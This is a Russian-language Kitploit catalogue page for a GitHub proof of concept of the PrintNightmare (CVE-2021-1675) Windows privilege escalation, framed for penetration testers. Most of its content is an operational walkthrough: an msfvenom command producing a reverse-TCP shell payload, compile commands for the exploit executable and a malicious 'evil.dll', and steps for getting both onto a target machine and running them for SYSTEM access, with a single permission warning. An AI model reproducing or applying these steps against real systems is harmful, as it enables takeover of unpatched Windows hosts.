Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-1675 — Эксплойт локального повышения привилегий для CVE-2021-1675 (PrintNightmare), который устанавливает вредоносную DLL для получения доступа SYSTEM на уязвимых системах Windows. | Kitploit
Инструменты/GitHubGitHub/andrewtrube/cve-2021-1675
Повышение привилегийФреймворки для эксплойтовЭксплуатацияТестирование на ПроникновениеRed TeamingРазработка Полезной Нагрузки
GitHubandrewtrube/cve-2021-1675

CVE-2021-1675

Эксплойт локального повышения привилегий для CVE-2021-1675 (PrintNightmare), который устанавливает вредоносную DLL для получения доступа SYSTEM на уязвимых системах Windows.

Репозиторий
5154 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

PrintNightmare Local Privilege Escalation PoC

src/nightmare.cpp: исходный код для эксплуатации CVE-2021-1675 и получения системного доступа путем установки вредоносной DLL
src/payload-dll.cpp: исходный код DLL с вредоносным шеллкодом в функции входа

!!Используйте только на серверах, на которые у вас есть разрешение на тестирование

Краткое описание

CVE-2021-1675 — это уязвимость в службе диспетчера печати (Print Spooler) Microsoft Windows, которая позволяет злоумышленнику обойти проверку SeLoadDriverPrivilege. Это можно использовать для повышения привилегий на целевой машине путем установки вредоносной DLL, которая вызывает шеллкод или использует Windows API для установления обратного подключения. Затронуты версии Windows 10/8/Server 2008/Server 2012 до 8 июня 2021 года.

POC

  1. Скачайте или клонируйте git-репозиторий
  2. Используйте msfvenom для генерации подходящей полезной нагрузки на c $ msfvenom -p windows/shell/reverse_tcp EXITFUNC=THREAD LHOST=127.0.0.1 LPORT=4444 -f c
  3. Вставьте вывод msfvenom в payload-dll.cpp в место, где указано «change me»
  4. Скомпилируйте основной исполняемый файл x86_64-w64-mingw32-g++-win32 -o ./src/nightmare.o -c -g -Wall ./src/nightmare.cpp x86_64-w64-mingw32-g++-win32 -o ./bin/PrintNightmareLPE.exe ./src/nightmare.o -lws2_32 -static-libgcc -static-libstdc++ -lole32 -lwinspool
  5. Скомпилируйте DLL x86_64-w64-mingw32-g++ src/payload-dll.cpp -lws2_32 -o lib/evil.dll -shared
  6. Заархивируйте exe и dll, затем найдите способ загрузить архив на целевую машину zip ./bin/PrinterNightmareLPE.exe ./lib/
  7. После того как архив окажется на целевой Windows-машине, распакуйте его
  8. Переместите evil.dll в c:\windows\temp\evil.dll
  9. Запустите PrintNightmareLPE.exe

Примечания

  • Если все работает правильно, эксплойт должен перебирать драйверы принтеров Windows и выводить результаты
  • Вы можете изменить путь к файлу, из которого PrintNightmareLPE.exe загружает evil.dll, в исходном коде
  • В настоящее время вредоносная DLL просто запускает calc.exe в качестве Proof-of-Concept
Скачать инструмент